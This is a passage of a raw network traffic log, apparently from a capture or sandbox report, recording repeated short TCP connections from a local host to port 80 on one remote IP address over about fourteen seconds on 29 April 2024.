Apr 29, 2024 01:04:16.061431885 CEST	49863	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:16.082843065 CEST	49864	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:16.171803951 CEST	80	49863	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:16.175309896 CEST	80	49863	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:16.175652981 CEST	49863	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:16.192668915 CEST	80	49864	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:16.192884922 CEST	49864	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:16.192981005 CEST	49864	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:16.302582026 CEST	80	49864	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:16.303087950 CEST	80	49864	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:16.303260088 CEST	49864	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:16.326083899 CEST	80	49863	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:16.412834883 CEST	80	49864	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:16.582658052 CEST	80	49863	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:16.582680941 CEST	80	49863	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:16.582879066 CEST	49863	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:16.701178074 CEST	49863	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:16.702079058 CEST	49865	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:16.720676899 CEST	80	49864	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:16.720695019 CEST	80	49864	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:16.720860958 CEST	49864	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:16.812438965 CEST	80	49865	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:16.812655926 CEST	49865	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:16.812655926 CEST	49865	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:16.812962055 CEST	80	49863	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:16.813018084 CEST	49863	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:16.922944069 CEST	80	49865	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:16.923571110 CEST	80	49865	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:16.923774004 CEST	49865	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:17.075756073 CEST	80	49865	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:17.201752901 CEST	80	49865	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:17.201766968 CEST	80	49865	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:17.201777935 CEST	80	49865	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:17.201845884 CEST	49865	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:17.335031033 CEST	49864	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:17.335206032 CEST	49865	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:17.335588932 CEST	49866	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:17.445116043 CEST	80	49866	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:17.445188046 CEST	49866	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:17.445249081 CEST	80	49864	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:17.445393085 CEST	49864	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:17.446147919 CEST	80	49865	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:17.446192026 CEST	49866	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:17.446203947 CEST	49865	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:17.555696964 CEST	80	49866	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:17.556068897 CEST	80	49866	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:17.556217909 CEST	49866	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:17.707590103 CEST	80	49866	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:17.967308998 CEST	80	49866	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:17.967324972 CEST	80	49866	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:17.967488050 CEST	49866	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:18.095722914 CEST	49866	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:18.096474886 CEST	49867	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:18.205645084 CEST	80	49866	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:18.205734015 CEST	49866	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:18.206165075 CEST	80	49867	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:18.206490993 CEST	49867	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:18.206595898 CEST	49867	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:18.316541910 CEST	80	49867	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:18.318101883 CEST	80	49867	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:18.318243980 CEST	49867	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:18.468302011 CEST	80	49867	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:18.599206924 CEST	80	49867	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:18.599227905 CEST	80	49867	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:18.599313974 CEST	49867	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:18.721465111 CEST	49867	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:18.722132921 CEST	49868	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:18.831820965 CEST	80	49867	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:18.831872940 CEST	80	49868	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:18.831922054 CEST	49867	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:18.831989050 CEST	49868	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:18.832109928 CEST	49868	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:18.941699028 CEST	80	49868	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:18.943492889 CEST	80	49868	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:18.943733931 CEST	49868	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:19.093832970 CEST	80	49868	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:19.336375952 CEST	80	49868	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:19.336498022 CEST	80	49868	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:19.336540937 CEST	49868	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:19.458000898 CEST	49868	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:19.458587885 CEST	49869	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:19.567997932 CEST	80	49868	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:19.568059921 CEST	49868	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:19.568902016 CEST	80	49869	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:19.568977118 CEST	49869	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:19.569267035 CEST	49869	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:19.679536104 CEST	80	49869	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:19.680035114 CEST	80	49869	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:19.680300951 CEST	49869	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:19.831113100 CEST	80	49869	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:20.099668026 CEST	80	49869	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:20.099687099 CEST	80	49869	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:20.099749088 CEST	49869	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:20.220655918 CEST	49869	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:20.221154928 CEST	49870	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:20.331489086 CEST	80	49870	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:20.331568956 CEST	49870	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:20.331696033 CEST	49870	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:20.331789970 CEST	80	49869	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:20.331835032 CEST	49869	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:20.441911936 CEST	80	49870	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:20.442259073 CEST	80	49870	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:20.442420006 CEST	49870	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:20.594083071 CEST	80	49870	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:20.727821112 CEST	80	49870	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:20.727878094 CEST	80	49870	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:20.727994919 CEST	80	49870	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:20.728049994 CEST	49870	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:20.768372059 CEST	49870	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:20.845124960 CEST	49870	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:20.846005917 CEST	49871	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:20.955811024 CEST	80	49871	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:20.955913067 CEST	49871	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:20.956155062 CEST	49871	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:20.958384037 CEST	80	49870	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:20.958431959 CEST	49870	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:21.067187071 CEST	80	49871	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:21.067795038 CEST	80	49871	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:21.068058014 CEST	49871	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:21.219499111 CEST	80	49871	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:21.376578093 CEST	80	49871	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:21.376629114 CEST	80	49871	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:21.376744986 CEST	49871	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:21.499641895 CEST	49871	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:21.500245094 CEST	49872	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:21.609836102 CEST	80	49872	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:21.609908104 CEST	49872	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:21.610027075 CEST	80	49871	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:21.610028028 CEST	49872	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:21.610085964 CEST	49871	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:21.719711065 CEST	80	49872	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:21.720218897 CEST	80	49872	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:21.720475912 CEST	49872	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:21.723860025 CEST	49873	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:21.833848000 CEST	80	49873	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:21.833920956 CEST	49873	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:21.834001064 CEST	49873	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:21.871870041 CEST	80	49872	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:21.943615913 CEST	80	49873	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:21.944144964 CEST	80	49873	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:21.944355965 CEST	49873	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:22.054076910 CEST	80	49873	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:22.141369104 CEST	80	49872	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:22.141390085 CEST	80	49872	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:22.141439915 CEST	49872	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:22.263976097 CEST	49872	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:22.264607906 CEST	49874	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:22.345143080 CEST	80	49873	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:22.345279932 CEST	80	49873	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:22.345341921 CEST	49873	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:22.374242067 CEST	80	49872	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:22.374300957 CEST	80	49874	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:22.374322891 CEST	49872	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:22.374372005 CEST	49874	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:22.374492884 CEST	49874	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:22.484296083 CEST	80	49874	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:22.484631062 CEST	80	49874	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:22.484780073 CEST	49874	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:22.635008097 CEST	80	49874	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:22.866976023 CEST	80	49874	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:22.867007971 CEST	80	49874	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:22.867067099 CEST	49874	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:22.986500978 CEST	49873	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:22.986675024 CEST	49874	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:22.987502098 CEST	49875	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:23.096698046 CEST	80	49873	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:23.096920967 CEST	80	49874	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:23.096981049 CEST	80	49875	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:23.096997976 CEST	49873	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:23.097002029 CEST	49874	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:23.097039938 CEST	49875	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:23.097167969 CEST	49875	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:23.206698895 CEST	80	49875	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:23.206985950 CEST	80	49875	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:23.207246065 CEST	49875	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:23.358403921 CEST	80	49875	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:23.504035950 CEST	80	49875	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:23.504057884 CEST	80	49875	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:23.504131079 CEST	49875	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:23.625190973 CEST	49875	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:23.625915051 CEST	49876	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:23.738307953 CEST	80	49875	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:23.738362074 CEST	49875	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:23.738820076 CEST	80	49876	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:23.738893986 CEST	49876	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:23.739029884 CEST	49876	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:23.849474907 CEST	80	49876	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:23.849699974 CEST	80	49876	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:23.849842072 CEST	49876	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:24.000483990 CEST	80	49876	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:24.246730089 CEST	80	49876	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:24.246757984 CEST	80	49876	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:24.246846914 CEST	49876	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:24.377079010 CEST	49876	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:24.377862930 CEST	49877	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:24.488761902 CEST	80	49877	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:24.488851070 CEST	49877	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:24.488949060 CEST	49877	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:24.489053965 CEST	80	49876	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:24.489106894 CEST	49876	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:24.598793983 CEST	80	49877	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:24.599045992 CEST	80	49877	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:24.599178076 CEST	49877	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:24.751565933 CEST	80	49877	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:25.022265911 CEST	80	49877	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:25.022283077 CEST	80	49877	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:25.022337914 CEST	49877	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:25.143322945 CEST	49877	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:25.144037008 CEST	49878	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:25.253357887 CEST	80	49877	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:25.253428936 CEST	49877	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:25.254570961 CEST	80	49878	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:25.254647017 CEST	49878	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:25.254898071 CEST	49878	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:25.365195036 CEST	80	49878	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:25.365510941 CEST	80	49878	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:25.365798950 CEST	49878	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:25.517503023 CEST	80	49878	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:25.749730110 CEST	80	49878	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:25.749744892 CEST	80	49878	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:25.749809027 CEST	49878	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:25.876482010 CEST	49878	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:25.877146006 CEST	49879	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:25.987179995 CEST	80	49878	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:25.987256050 CEST	49878	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:25.987379074 CEST	80	49879	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:25.987442970 CEST	49879	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:25.987595081 CEST	49879	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:26.097944975 CEST	80	49879	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:26.098429918 CEST	80	49879	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:26.098628044 CEST	49879	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:26.250029087 CEST	80	49879	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:26.483575106 CEST	80	49879	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:26.483591080 CEST	80	49879	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:26.483650923 CEST	49879	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:26.607753038 CEST	49879	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:26.608629942 CEST	49880	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:26.718914986 CEST	80	49880	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:26.719002008 CEST	49880	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:26.719120026 CEST	80	49879	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:26.719139099 CEST	49880	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:26.719165087 CEST	49879	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:26.829382896 CEST	80	49880	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:26.829715014 CEST	80	49880	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:26.829848051 CEST	49880	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:26.981157064 CEST	80	49880	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:27.226433992 CEST	80	49880	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:27.226448059 CEST	80	49880	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:27.226459026 CEST	80	49880	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:27.226515055 CEST	49880	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:27.268363953 CEST	49880	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:27.345864058 CEST	49880	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:27.346599102 CEST	49881	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:27.347207069 CEST	49882	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:27.456891060 CEST	80	49881	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:27.456964016 CEST	80	49880	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:27.456969023 CEST	49881	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:27.457003117 CEST	49880	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:27.457149982 CEST	49881	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:27.457494020 CEST	80	49882	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:27.457559109 CEST	49882	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:27.457648039 CEST	49882	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:27.567320108 CEST	80	49881	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:27.567728996 CEST	80	49881	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:27.567858934 CEST	49881	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:27.568027020 CEST	80	49882	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:27.568360090 CEST	80	49882	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:27.568469048 CEST	49882	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:27.678755045 CEST	80	49882	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:27.718760967 CEST	80	49881	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:27.851625919 CEST	80	49881	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:27.851639986 CEST	80	49881	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:27.851761103 CEST	49881	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:27.958105087 CEST	80	49882	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:27.958120108 CEST	80	49882	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:27.958254099 CEST	49882	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:27.977919102 CEST	49881	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:27.977973938 CEST	49882	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:27.978519917 CEST	49883	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:28.088515997 CEST	80	49883	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:28.088629007 CEST	80	49881	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:28.088712931 CEST	49881	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:28.088721991 CEST	49883	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:28.088915110 CEST	49883	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:28.089092016 CEST	80	49882	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:28.089138985 CEST	49882	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:28.198725939 CEST	80	49883	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:28.199137926 CEST	80	49883	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:28.199506044 CEST	49883	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:28.350156069 CEST	80	49883	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:28.588009119 CEST	80	49883	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:28.588025093 CEST	80	49883	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:28.588037968 CEST	80	49883	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:28.588093042 CEST	49883	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:28.708431005 CEST	49883	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:28.709506035 CEST	49884	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:28.818631887 CEST	80	49883	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:28.818722963 CEST	49883	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:28.819149971 CEST	80	49884	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:28.819238901 CEST	49884	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:28.819525957 CEST	49884	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:28.929063082 CEST	80	49884	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:28.929471016 CEST	80	49884	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:28.929687023 CEST	49884	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:29.080022097 CEST	80	49884	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:29.232671976 CEST	80	49884	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:29.232685089 CEST	80	49884	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:29.232745886 CEST	49884	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:29.356550932 CEST	49884	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:29.357475042 CEST	49885	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:29.466634035 CEST	80	49884	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:29.466710091 CEST	49884	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:29.468244076 CEST	80	49885	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:29.468310118 CEST	49885	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:29.468441963 CEST	49885	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:29.578692913 CEST	80	49885	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:29.578988075 CEST	80	49885	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:29.579108000 CEST	49885	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:29.730585098 CEST	80	49885	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:29.979368925 CEST	80	49885	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:29.979391098 CEST	80	49885	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:29.979468107 CEST	49885	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:30.094449043 CEST	49885	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:30.095314026 CEST	49886	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:30.204938889 CEST	80	49886	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:30.205017090 CEST	49886	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:30.205161095 CEST	49886	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:30.205555916 CEST	80	49885	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:30.205604076 CEST	49885	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:30.314759016 CEST	80	49886	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:30.315038919 CEST	80	49886	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:30.315232038 CEST	49886	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:30.466476917 CEST	80	49886	172.67.144.153	192.168.2.4
